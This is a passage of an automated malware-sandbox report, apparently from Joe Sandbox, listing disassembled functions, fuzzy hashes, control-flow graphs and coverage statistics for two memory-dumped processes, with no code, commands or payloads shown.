                                • Instruction Fuzzy Hash: 51D0E231B05A2D8ECB64EA88E8107EDB7B1EB89311F8002B2C50CE3159CA3069468B81

                                Non-executed Functions

                                Function 00007FFD9B8906FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                • Opcode ID: 492069b6d2fae864101df20032f08b8a213227997577dc6a43dc202ffccb7524
                                • Instruction ID: 8dc97e7f07101676ef18734aeee0b7967a5b85ea0b2859dab36eab07a6171790
                                • Opcode Fuzzy Hash: 492069b6d2fae864101df20032f08b8a213227997577dc6a43dc202ffccb7524
                                • Instruction Fuzzy Hash: 63518A63B0F6851BEB2297DC6CA51A87FA1FF45B6075901F7E198C70A7F815A90283C2
                                Function 00007FFD9B8906A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.1766311273.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7ffd9b890000_fontdrvhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: 0e6d96fb6f5052b4dda33a4173e45613758cf99961ec4940e907fce15c08cde3
                                • Instruction ID: 131f10e2c7c1654ef6655b4177617c089ce11ab38812a706647eca96fa643a23
                                • Opcode Fuzzy Hash: 0e6d96fb6f5052b4dda33a4173e45613758cf99961ec4940e907fce15c08cde3
                                • Instruction Fuzzy Hash: 5351A963B0F6951BEB2657EC2CA00A86F91FF85B7071506F7E198CB0E7E815A90683C1

                                Execution Graph

                                Execution Coverage:17.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:17
                                Total number of Limit Nodes:3
                                execution_graph 18174 7ffd9b8b68c9 18175 7ffd9b8b68d1 CopyIcon 18174->18175 18177 7ffd9b8b69c4 18175->18177 18157 7ffd9b8b6250 18162 7ffd9b8b6259 18157->18162 18158 7ffd9b8b6304 18160 7ffd9b8b66c4 18169 7ffd9b8b687e 18160->18169 18162->18158 18162->18160 18163 7ffd9b8b682b 18162->18163 18165 7ffd9b8b6836 18163->18165 18166 7ffd9b8b687e 18163->18166 18164 7ffd9b8b6889 18164->18160 18165->18160 18166->18164 18167 7ffd9b8b698d CopyIcon 18166->18167 18168 7ffd9b8b69c4 18167->18168 18168->18160 18170 7ffd9b8b6889 18169->18170 18171 7ffd9b8b68d1 CopyIcon 18169->18171 18170->18158 18173 7ffd9b8b69c4 18171->18173 18173->18158

                                Executed Functions

                                Function 00007FFD9B89B9E0 Relevance: .6, Instructions: 587COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 868d6b91160956496a7df6a398793e114cdae6b155ef742334ff749bb796286c
                                • Instruction ID: 91373c512b72911967ee1593e7b5a99696216717aba990de976799bfd27a1210
                                • Opcode Fuzzy Hash: 868d6b91160956496a7df6a398793e114cdae6b155ef742334ff749bb796286c
                                • Instruction Fuzzy Hash: 00324270A09A2C8FDFA9DF18C894BA9B7B5FB69315F5005EA910DE3255CA719E80CF04
                                Function 00007FFD9B8A831D Relevance: .5, Instructions: 509COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc44ca585bce2e35b066910b0ccafa63744d1e700ded0e56a980dec65768d21a
                                • Instruction ID: b8afd8bed4b422e2df7df84b651556bedb7d111051f20be7bca38afef74cee52
                                • Opcode Fuzzy Hash: bc44ca585bce2e35b066910b0ccafa63744d1e700ded0e56a980dec65768d21a
                                • Instruction Fuzzy Hash: EC120770E09A2D8FDBA4EF58C894BA8B7B1FF59304F5001A9D10DE3295DB34AA85CF54
                                Function 00007FFD9B8B03E1 Relevance: .3, Instructions: 279COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1aede9b88492125832fb07148c31a7efaaf16c0f47df9694be80e8eacc750860
                                • Instruction ID: b9db8d401438836038ef78dbf227b29b44a7b9fda86b086c74157fa249a6fa73
                                • Opcode Fuzzy Hash: 1aede9b88492125832fb07148c31a7efaaf16c0f47df9694be80e8eacc750860
                                • Instruction Fuzzy Hash: 76A1EA30E19A5D8FDB94EF68C895BACB7B1FF59301F5005AAD00DE32A5CB35A981CB40
                                Function 00007FFD9B8B2C4C Relevance: .2, Instructions: 212COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d4e54538dc540aab21ee01e37e3087501ad5ebfba45f8f39c4979e844ca802c
                                • Instruction ID: e623e49fec32eb9ab85d0f393dadfe01bba071043c38a37738e25dc178aba7d0
                                • Opcode Fuzzy Hash: 1d4e54538dc540aab21ee01e37e3087501ad5ebfba45f8f39c4979e844ca802c
                                • Instruction Fuzzy Hash: 3761E731E09A5D8FDF90EFA8D858BADBBF1FB59301F110166D40CE3296DA34A985CB41
                                Function 00007FFD9B8B27CC Relevance: .1, Instructions: 137COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 382738ea6130c30cc14a8311a8c8ce3ac18fdd933caa770bd39039886ff2cf1f
                                • Instruction ID: 6719e7543bf440720e34373d7e7ebc45c48516ac328bff05174cc3e912a02b46
                                • Opcode Fuzzy Hash: 382738ea6130c30cc14a8311a8c8ce3ac18fdd933caa770bd39039886ff2cf1f
                                • Instruction Fuzzy Hash: 80410E71E1D96D8FDFA4DF588895AA8B7F1FB68351F0001DAD04DE3251CA39BA818F81
                                Function 00007FFD9B8B3F77 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28dd12a02fc806fc1c9d0a39e34ad44c540f87bd6cd30f6560e3b6c859d4349c
                                • Instruction ID: 385d925946937d7eb9b2a2735609d82327f318663d46780e71dc500787950178
                                • Opcode Fuzzy Hash: 28dd12a02fc806fc1c9d0a39e34ad44c540f87bd6cd30f6560e3b6c859d4349c
                                • Instruction Fuzzy Hash: 7C219330A4992D8FDFA4EB68C855BA8B3B5EF59300F5140E5D00DE3261DA34AE858F41
                                Function 00007FFD9B8906FA Relevance: 7.7, Strings: 6, Instructions: 232COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 333 7ffd9b8906fa-7ffd9b890737 335 7ffd9b890739-7ffd9b89079c 333->335 342 7ffd9b89079e-7ffd9b8908a1 335->342 361 7ffd9b8908a8-7ffd9b8908e7 342->361 362 7ffd9b8908a3 342->362 364 7ffd9b8908e9 361->364 365 7ffd9b8908ee-7ffd9b890905 call 7ffd9b8904f8 361->365 362->361 364->365 368 7ffd9b89090a-7ffd9b89091e 365->368
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                • Opcode ID: cf64c7bcd9214fff3596255617e1e550510df3047d99dd3259ccf672651b8300
                                • Instruction ID: d2383a082946d2180063f89b5f46dcd41c70e4251027c3e641782c5c1701a041
                                • Opcode Fuzzy Hash: cf64c7bcd9214fff3596255617e1e550510df3047d99dd3259ccf672651b8300
                                • Instruction Fuzzy Hash: 2861AE63B0F6895FEB2297DC5CA41E87FA1FF45760B4501F7D158C70A7EC15A9068381
                                Function 00007FFD9B8906E0 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 370 7ffd9b8906e0-7ffd9b890737 374 7ffd9b890739-7ffd9b89079c 370->374 381 7ffd9b89079e-7ffd9b8908a1 374->381 400 7ffd9b8908a8-7ffd9b8908e7 381->400 401 7ffd9b8908a3 381->401 403 7ffd9b8908e9 400->403 404 7ffd9b8908ee-7ffd9b8908f5 400->404 401->400 403->404 405 7ffd9b8908f7-7ffd9b890905 call 7ffd9b8904f8 404->405 407 7ffd9b89090a-7ffd9b89091e 405->407
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^X$N_^f$N_^g
                                • API String ID: 0-3255808656
                                • Opcode ID: 8d33b814f53705e09db852fce5cc4fd278a22c1d0eeea874b51107369f75eda4
                                • Instruction ID: 233e3e18bc10007e0d091b7a4983d7001fb6866aa5c53b93e3982e6826bb8a5d
                                • Opcode Fuzzy Hash: 8d33b814f53705e09db852fce5cc4fd278a22c1d0eeea874b51107369f75eda4
                                • Instruction Fuzzy Hash: BE61BD63B0F6895BEB2697DC6CA50E87FA0FF49760B4502F7E058C70E7EC156A068381
                                Function 00007FFD9B8906A5 Relevance: 6.5, Strings: 5, Instructions: 247COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 409 7ffd9b8906a5-7ffd9b890737 413 7ffd9b890739-7ffd9b89079c 409->413 420 7ffd9b89079e-7ffd9b8908a1 413->420 439 7ffd9b8908a8-7ffd9b8908e7 420->439 440 7ffd9b8908a3 420->440 442 7ffd9b8908e9 439->442 443 7ffd9b8908ee-7ffd9b8908f5 439->443 440->439 442->443 444 7ffd9b8908f7-7ffd9b890905 call 7ffd9b8904f8 443->444 446 7ffd9b89090a-7ffd9b89091e 444->446
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: e4245ea89de9462f7d7b8548654718cbe0b8649343b3503ccc45a70aeb1404f6
                                • Instruction ID: cb180cc5befb068c38ca5d01e4fa4b35395c34986a052c361516aa2ea5aacae9
                                • Opcode Fuzzy Hash: e4245ea89de9462f7d7b8548654718cbe0b8649343b3503ccc45a70aeb1404f6
                                • Instruction Fuzzy Hash: 4A61CB63B0F6895BEB2197EC6CA40E87FA1FF45760B1505FBD198C70E7E815A90683C1
                                Function 00007FFD9B8B687E Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 948 7ffd9b8b687e-7ffd9b8b6887 949 7ffd9b8b6889-7ffd9b8b68a0 948->949 950 7ffd9b8b68d1-7ffd9b8b68e5 948->950 951 7ffd9b8b68bc-7ffd9b8b68c4 949->951 952 7ffd9b8b68a2-7ffd9b8b68bb 949->952 953 7ffd9b8b68e7 950->953 954 7ffd9b8b68e8-7ffd9b8b68f5 950->954 952->951 953->954 956 7ffd9b8b68f7 954->956 957 7ffd9b8b68f8-7ffd9b8b6905 954->957 956->957 958 7ffd9b8b6907 957->958 959 7ffd9b8b6908-7ffd9b8b6915 957->959 958->959 960 7ffd9b8b6917 959->960 961 7ffd9b8b6918-7ffd9b8b6925 959->961 960->961 962 7ffd9b8b6927 961->962 963 7ffd9b8b6928-7ffd9b8b6985 961->963 962->963 966 7ffd9b8b698d-7ffd9b8b69c2 CopyIcon 963->966 967 7ffd9b8b69ca-7ffd9b8b69e6 966->967 968 7ffd9b8b69c4 966->968 968->967
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6f1a5d177dc19cdceca233025e604040af2587def426c4c52ef9031d079652d
                                • Instruction ID: 48bf3291a8e1f8b13e97a15aaa8d93316807d1f7dd436d05575df4911547e277
                                • Opcode Fuzzy Hash: e6f1a5d177dc19cdceca233025e604040af2587def426c4c52ef9031d079652d
                                • Instruction Fuzzy Hash: 6D518C7198D69C4FD71ADB749C166E9BBF0EF46320F0901ABD04CC70A2C629A547CBD1
                                Function 00007FFD9B8B68C9 Relevance: 1.7, APIs: 1, Instructions: 155windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 969 7ffd9b8b68c9-7ffd9b8b68e5 971 7ffd9b8b68e7 969->971 972 7ffd9b8b68e8-7ffd9b8b68f5 969->972 971->972 973 7ffd9b8b68f7 972->973 974 7ffd9b8b68f8-7ffd9b8b6905 972->974 973->974 975 7ffd9b8b6907 974->975 976 7ffd9b8b6908-7ffd9b8b6915 974->976 975->976 977 7ffd9b8b6917 976->977 978 7ffd9b8b6918-7ffd9b8b6925 976->978 977->978 979 7ffd9b8b6927 978->979 980 7ffd9b8b6928-7ffd9b8b69c2 CopyIcon 978->980 979->980 984 7ffd9b8b69ca-7ffd9b8b69e6 980->984 985 7ffd9b8b69c4 980->985 985->984
                                APIs
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b895000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID: CopyIcon
                                • String ID:
                                • API String ID: 2764894445-0
                                • Opcode ID: 07a4b8826170a0c94895dbcec41a427428588e67dbddc77e9af75799554d87e9
                                • Instruction ID: e556e943bee73fbb72e8c9daaf7bf2e6eb5eb0d97118da5056d02b7d87ac88f5
                                • Opcode Fuzzy Hash: 07a4b8826170a0c94895dbcec41a427428588e67dbddc77e9af75799554d87e9
                                • Instruction Fuzzy Hash: E641777198D6984FD70ACBB49C166E97FB0EF46320F0902ABD048C70A3C629A547CBD1
                                Function 00007FFD9B8904F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1141 7ffd9b8904f8-7ffd9b891279 1148 7ffd9b89127b 1141->1148 1149 7ffd9b891280-7ffd9b89128f call 7ffd9b8905d8 1141->1149 1148->1149 1151 7ffd9b891294-7ffd9b89129b 1149->1151
                                Strings
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                Function 00007FFD9B890F71 Relevance: .4, Instructions: 371COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction ID: de80653e765045f43532d634ff927bfaa3ef6991ce3a351c72be6ccd64f29e74
                                • Opcode Fuzzy Hash: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction Fuzzy Hash: 70D13D71E1965D8FDBACDB58D8A4BA8BBB1FF58300F4441B9D00DE32E6DA356981CB01
                                Function 00007FFD9B893239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 60549bc7e1c0e8465cc30f24176113cb0d372db8b4b45ecc486bad1b167b4b0e
                                • Instruction ID: 57221d883088d0131891cd9f7684e57bb9badaa9d05b3781d3ebaaa1c11cce86
                                • Opcode Fuzzy Hash: 60549bc7e1c0e8465cc30f24176113cb0d372db8b4b45ecc486bad1b167b4b0e
                                • Instruction Fuzzy Hash: 60B14D71E1965D8FDBACDB58D8A4BA8B7A1FF58300F0441B9D00DE72E6DE346981CB01
                                Function 00007FFD9B890F8D Relevance: .3, Instructions: 307COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e91d95c68014b800ee9a058d43f767c1e1b3a6ee631cb2002c2f399afbb0e17
                                • Instruction ID: 71b47f21d2d6e814dcb15b6e479fbcd8977ebd6a04d602dad9beeda5fbd84dc9
                                • Opcode Fuzzy Hash: 4e91d95c68014b800ee9a058d43f767c1e1b3a6ee631cb2002c2f399afbb0e17
                                • Instruction Fuzzy Hash: FAB14D71E1965D8FDBACDB58D8A4BA8BBB1FF58300F4441B9D00DE72A6DE356980CB01
                                Function 00007FFD9B8905D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f188c792663113a954f86c5e7c4a9f02340b10c6713e4300fe08f5c4e1d625f4
                                • Instruction ID: 869d75b574d930472c77c17d6a5dcef10c0d790432f922fe92d30e6248c682a3
                                • Opcode Fuzzy Hash: f188c792663113a954f86c5e7c4a9f02340b10c6713e4300fe08f5c4e1d625f4
                                • Instruction Fuzzy Hash: 1781E231B1DA494BDF68EF5C88615B97BE2FF9C300B15457EE45EC3292DE34A9028780
                                Function 00007FFD9B89129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78e03ae86fbef1c7855c178941ab38b97909361eae1372f78e91c2d64cea5ccf
                                • Instruction ID: 1247d787e82a0bf828cb4767e26e360577e965222b75a99e2f71e521b4f43252
                                • Opcode Fuzzy Hash: 78e03ae86fbef1c7855c178941ab38b97909361eae1372f78e91c2d64cea5ccf
                                • Instruction Fuzzy Hash: C951DF30B1CA4A4FDB58EF5888645BA7BE2FF98304B15417EE45EC7292DE34E8028781
                                Function 00007FFD9B892B35 Relevance: .2, Instructions: 171COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04ed4db1cf1713d418eeb2892b88e13c91f66e5b9fbec57fbae3ecd5ca1e8357
                                • Instruction ID: bc3a87d16377b48d20d10135fa79566b99e02d4325d6f8561d1f54fc2bb94e8f
                                • Opcode Fuzzy Hash: 04ed4db1cf1713d418eeb2892b88e13c91f66e5b9fbec57fbae3ecd5ca1e8357
                                • Instruction Fuzzy Hash: 07518D3190E68D8FDB55DFA8D8506ED7BB0FF4A314F0401AAE458E3192DB389A55CB81
                                Function 00007FFD9B892CD9 Relevance: .2, Instructions: 166COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 766d265d79f9496ad394a69d3b31e02c2a570ff63ddfaedcbca4325fc7962cbb
                                • Instruction ID: 6d8dfea8d2cdd6d298ea77315260bd8880437bb092d34738c79a2489b3203890
                                • Opcode Fuzzy Hash: 766d265d79f9496ad394a69d3b31e02c2a570ff63ddfaedcbca4325fc7962cbb
                                • Instruction Fuzzy Hash: AC513071A1995D8FDF98EF98C865AECBBB1FF59300F41016AE00DE7292CA64A941CB40
                                Function 00007FFD9B891C19 Relevance: .2, Instructions: 160COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da2051e955b3300df3fc552479a90a28cba3bc7d2ffd6d4c29c060bee80e7f96
                                • Instruction ID: 859e2a63388e1a04d8eaee063c57e327fc51c632eaa57c6e3e5171b477ee6278
                                • Opcode Fuzzy Hash: da2051e955b3300df3fc552479a90a28cba3bc7d2ffd6d4c29c060bee80e7f96
                                • Instruction Fuzzy Hash: BC519C31A0E64D8FDB55EB68C8646ED7BB0FF09310F4501AAD018D72E2DB78AA49CB41
                                Function 00007FFD9B89238D Relevance: .2, Instructions: 158COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ca2730cb4dd0a92c11d3688e084e91532de7bf30de5c68688e9195d48a76c33
                                • Instruction ID: 0749839933b25f2699024f5181e428a8c0b08b5a0010eb1b1ab67e27eb358b51
                                • Opcode Fuzzy Hash: 3ca2730cb4dd0a92c11d3688e084e91532de7bf30de5c68688e9195d48a76c33
                                • Instruction Fuzzy Hash: F751B461A0E69D4FEBA5DBA88C657A87FA0EF55300F0540F7D08CC71E7DE246A85C741
                                Function 00007FFD9B890EA8 Relevance: .1, Instructions: 147COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 781736c1225bb1eedcd64f43eef3293f796404045fc3290d7ec1ac7d4507e3a5
                                • Instruction ID: 61b791a9268f9523e93f3d7ff7f334dc48dbdf7d7273c6ce1cf11801b5645417
                                • Opcode Fuzzy Hash: 781736c1225bb1eedcd64f43eef3293f796404045fc3290d7ec1ac7d4507e3a5
                                • Instruction Fuzzy Hash: BC41FA71A1995D8FEF98EF98C855AEDBBB1FF59300F510129E00DE32A5CA74A941CB40
                                Function 00007FFD9B891ECD Relevance: .1, Instructions: 143COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bb3622c3f9b47901a6da29f87fe4abb9511cf4ba7ac2734882715dd1bd925d1
                                • Instruction ID: 44538196d9470177204617bceadd5f48d1caf5bfe8d76364b6f00ddcfdf6a60e
                                • Opcode Fuzzy Hash: 6bb3622c3f9b47901a6da29f87fe4abb9511cf4ba7ac2734882715dd1bd925d1
                                • Instruction Fuzzy Hash: 4841BD3194E3CD5FDB16AB248C655E97FB0EF06210F0A02EBD454CB0E3EB28A949C742
                                Function 00007FFD9B891828 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.4103147243.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_7ffd9b890000_jnTUlYyDyuybgXdgxhTkT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b51f7e60d3350ac25d8c13ccd9141fe7a562832c3c6d7d41cddc122ee70e97d
                                • Instruction ID: db19cc34c88909f789a19a9b7b91aab49195fa7926c1dd84f6bcf130e09ce503
                                • Opcode Fuzzy Hash: 4b51f7e60d3350ac25d8c13ccd9141fe7a562832c3c6d7d41cddc122ee70e97d
                                • Instruction Fuzzy Hash: 42319231E1E61E9AEB74BB9084217F8B6A1FF4A700F410279D05EA21E1CF396A45DA80
                                Function 00007FFD9B893085 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
